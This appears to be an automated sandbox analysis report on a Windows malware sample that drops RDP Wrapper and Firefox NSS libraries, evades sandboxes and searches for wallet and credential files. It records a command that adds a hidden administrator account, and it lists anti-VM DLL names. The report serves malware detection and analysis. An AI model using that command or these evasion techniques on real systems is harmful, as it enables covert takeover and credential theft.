Source:	Binary string: c:\rje\tg\ps7uj1z\obj\Release\ojc.pdb source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: AFHDGDGIID.exe, 0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, AFHDGDGIID.exe.2.dr, 66f5d9ab0d4c7_rdp[1].exe.2.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: AFHDGDGIID.exe.2.dr, QXNzZW1ibHlMb2FkZXJB.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: 66f5d9ab0d4c7_rdp[1].exe.2.dr, QXNzZW1ibHlMb2FkZXJB.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: 12.0.AFHDGDGIID.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AFHDGDGIID.exe PID: 3396, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\AFHDGDGIID.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exe, type: DROPPED

Source: AFHDGDGIID.exe.2.dr

Static PE information: 0xC8160FB5 [Sat May 16 21:10:13 2076 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00418950

Source: freebl3.dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr	Static PE information: section name: .didat
Source: softokn3.dll.2.dr	Static PE information: section name: .00cfg
Source: nss3.dll.2.dr	Static PE information: section name: .00cfg

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042F142 push ecx; ret	2_2_0042F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00422D3B push esi; ret	2_2_00422D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041DDB5 push ecx; ret	2_2_0041DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00432715 push 0000004Ch; iretd	2_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C11B536 push ecx; ret	2_2_6C11B549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0044F116 push esi; retf	8_2_0044F117
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00438B7E push cs; iretd	8_2_00438B85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FD73C51 push es; retf	11_2_1FD73C57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FDAA45D push esi; ret	11_2_1FDAA45F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FDA4BF0 push ecx; ret	11_2_1FDA4C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FDDDB66 push esp; retf	11_2_1FDDDB67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FDDD568 push esp; retf	11_2_1FDDD570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FDEF456 push ebx; ret	11_2_1FDEF457

Source: file.exe	Static PE information: section name: .text entropy: 7.9958244524809645
Source: IDBAFHDGDG.exe.2.dr	Static PE information: section name: .text entropy: 7.995375019999394
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	Static PE information: section name: .text entropy: 7.995375019999394
Source: GIIIIJDHJE.exe.2.dr	Static PE information: section name: .text entropy: 7.9958244524809645
Source: 66f5db9e54794_vfkagks[1].exe.2.dr	Static PE information: section name: .text entropy: 7.9958244524809645
Source: AFHDGDGIID.exe.2.dr	Static PE information: section name: .text entropy: 7.77601245760385
Source: 66f5d9ab0d4c7_rdp[1].exe.2.dr	Static PE information: section name: .text entropy: 7.77601245760385

Persistence and Installation Behavior

Adds a new user with administrator rights

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_fec8106a /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_fec8106a /add

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5db9e54794_vfkagks[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\ProgramData\AFHDGDGIID.exe	File created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	File created: C:\Program Files\RDP Wrapper\rdpwrap.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\GIIIIJDHJE.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDBAFHDGDG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	File created: C:\Windows\System32\rfxvmt.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\AFHDGDGIID.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5dbaca34ac_lfdnsafnds[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\GIIIIJDHJE.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IDBAFHDGDG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\AFHDGDGIID.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Windows\System32\rfxvmt.dll

Jump to dropped file

Source: C:\Windows\System32\drivers\tsusbhub.sys

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_00418950

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AFHDGDGIID.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 2.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3d45570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3d45570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 396, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Memory allocated: 22A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Memory allocated: 2480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Memory allocated: 22A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Memory allocated: DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Memory allocated: 27E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Memory allocated: 26E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\AFHDGDGIID.exe	Memory allocated: 1410000 memory reserve \| memory write watch
Source: C:\ProgramData\AFHDGDGIID.exe	Memory allocated: 2F50000 memory reserve \| memory write watch
Source: C:\ProgramData\AFHDGDGIID.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

2_2_0040180D

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\AFHDGDGIID.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\AFHDGDGIID.exe	Window / User API: threadDelayed 7868
Source: C:\ProgramData\AFHDGDGIID.exe	Window / User API: threadDelayed 2084

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Dropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 8.4 %

Source: C:\Users\user\Desktop\file.exe TID: 5608	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe TID: 2080	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5228	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe TID: 5888	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\AFHDGDGIID.exe TID: 7132	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\AFHDGDGIID.exe TID: 6276	Thread sleep count: 7868 > 30
Source: C:\ProgramData\AFHDGDGIID.exe TID: 6348	Thread sleep count: 2084 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5368	Thread sleep count: 52 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

2_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	2_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	2_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	2_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	2_2_0040CD37

